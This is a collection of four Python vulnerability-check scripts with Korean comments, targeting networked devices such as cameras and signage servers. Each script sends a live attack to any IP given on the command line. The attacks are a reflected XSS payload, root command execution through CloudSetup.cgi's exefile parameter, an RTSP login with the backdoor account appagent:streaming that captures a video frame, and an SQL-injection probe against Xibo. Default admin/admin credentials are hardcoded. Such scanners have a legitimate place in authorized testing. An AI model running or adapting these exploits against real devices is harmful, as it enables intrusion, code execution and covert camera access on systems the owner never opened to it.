1. Basic 방식
# -*- coding: cp949 -*-
# CVE : CVE-2015-1437
# Description :
# result_of_get_changed_status.asp의 flag 파라미터에서 스크립트 구문이 동작되어 세션 탈취 등을 할 수 있는 취약점
# 실제 기기 대상
'''
----REQUEST----
----RESPONSE----
'''
import requests
import sys
def packet(target, port):
try:
#Login -- Default admin/admin
headers = {'Authorization' : 'Basic YWRtaW46YWRtaW4='}
s = requests.Session()
url = 'http://'+target+':'+port+'/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+Apply+&preferred_lang=&flag=initial78846\'%3balert(\'nnormaa\')%2f%2f372137b5d'
resp = s.get(url, headers=headers, timeout=3)
if resp.status_code == 200 and 'alert(\'nnormaa\')' in resp.text:
print url+", Vulnarable CVE-2015-1437"
else:
print url+", Not Vulnarable CVE-2015-1437"
except:
print url+", Not Vulnarable CVE-2015-1437"
pass
# MAIN
if __name__ == "__main__":
if sys.argv[1] == "-usage" :
print "[IP] [PORT]"
elif len(sys.argv) is 3 :
packet(sys.argv[1], sys.argv[2])
sys.exit(1)
else:
sys.exit(1)
2. Digest 방식
# -*- coding: cp949 -*-
# CVE : NCVE-2016-0045
# Description :
# cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execute가 발생하는 취약점
'''
----REQUEST----
GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1
----RESPONSE----
HTTP/1.0 200 OK
uid=0(root) gid=0(root) groups=0(root)
'''
import requests
import sys
from requests.auth import HTTPDigestAuth
####ssl-warnings InsecureRequestWarning EXCEPT CASE 1
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#proxies={'http':'http://localhost:8080', 'https':'https://localhost:8080'}
# Packet Request
def packet(target, port):
try:
s = requests.Session()
s.auth=HTTPDigestAuth('admin','admin')
url="http://"+target+":"+port+"/cgi-bin/supervisor/CloudSetup.cgi?exefile=id"
resp=s.get(url, timeout=3, verify=False)
if resp.status_code == 200 and 'uid=0(root)' in resp.text:
print url+", Vulnerable to NCVE-2016-0045"
else:
print url+", Not Vulnerable to NCVE-2016-0045"
except:
print url+", Not Vulnerable to NCVE-2016-0045"
pass
# MAIN
if __name__ == "__main__":
if sys.argv[1] == "-usage" :
print "[IP] [PORT]"
elif len(sys.argv) is 3 :
packet(sys.argv[1], sys.argv[2])
sys.exit(1)
else:
sys.exit(1)
3. RTSP 방식
# -*- coding: cp949 -*-
# CVE : CVE-2018-10328
# Description :
# RSTP 프로토콜에 접근할 수 있는 appagent/streaming 백도어 계정이 존재하는 취약점
'''
'''
import sys
import cv2
import signal
import socket
import time
def handler(signum, frame):
raise Exception("end of time")
# Packet Reques
def packet(target):
try:
url='rtsp://appagent:streaming@'+target+':554'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((target,554))
s.close()
signal.signal(signal.SIGALRM, handler)
signal.alarm(3)
cap=cv2.VideoCapture(url)
success,image = cap.read()
if success == True:
print (url+", Vulnerable to CVE-2018-10328")
else:
print (url+", Not Vulnerable to CVE-2018-10328")
except:
print (url+", Not Vulnerable to CVE-2018-10328")
pass
# MAIN
if __name__ == "__main__":
if sys.argv[1] == "-usage" :
print ("[IP]")
elif len(sys.argv) == 2 :
packet(sys.argv[1])
sys.exit(1)
else:
sys.exit(1)
4. POST 방식
# -*- coding: cp949 -*-
# CVE : CVE-2013-4887
# Description :
# index.php의 displayid 파라미터에서 SQLi가 발생하여 데이터베이스에 접근할 수 있는 취약점
# PoC 분석으로 작성
# Reference. http://infosec42.blogspot.com/2013/08/exploit-xibo-digital-signage-sql.html
'''
----REQUEST----
----RESPONSE----
'''
import requests
import sys
####ssl-warnings InsecureRequestWarning EXCEPT CASE 1
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#proxies={'http':'http://localhost:8080', 'https':'https://localhost:8080'}
# Packet Request
def packet(target, port):
try:
s = requests.Session()
https_check=Https_Check(target, port,s)
url=https_check+"://"+target+":"+port+"/index.php?ajax=true"
data=(
('p','report'),
('q','LogGrid'),
('type','all'),
('fromdt','30/08/2020'),
('page','All'),
('seconds','1000'),
('function','All'),
('displayid','all\'')
)
resp=s.post(url, data=data,timeout=3, verify=False)
if resp.status_code == 200 and 'Can not query the log' in resp.text and 'uniqueReference' in resp.text:
print url+", Vulnerable to CVE-2013-4887"
else:
print url+", Not Vulnerable to CVE-2013-4887"
except:
print url+", Not Vulnerable to CVE-2013-4887"
pass
def Https_Check(target, port,s):
try:
resp=s.get('http://%s:%s' %(target,port))
if resp.status_code==400:
return 'https'
else:
return 'http'
except requests.exceptions.ConnectionError as e:
return 'https'
except:
return 'http'
# MAIN
if __name__ == "__main__":
if sys.argv[1] == "-usage" :
print "[IP] [PORT]"
elif len(sys.argv) is 3 :
packet(sys.argv[1], sys.argv[2])
sys.exit(1)
else:
sys.exit(1)
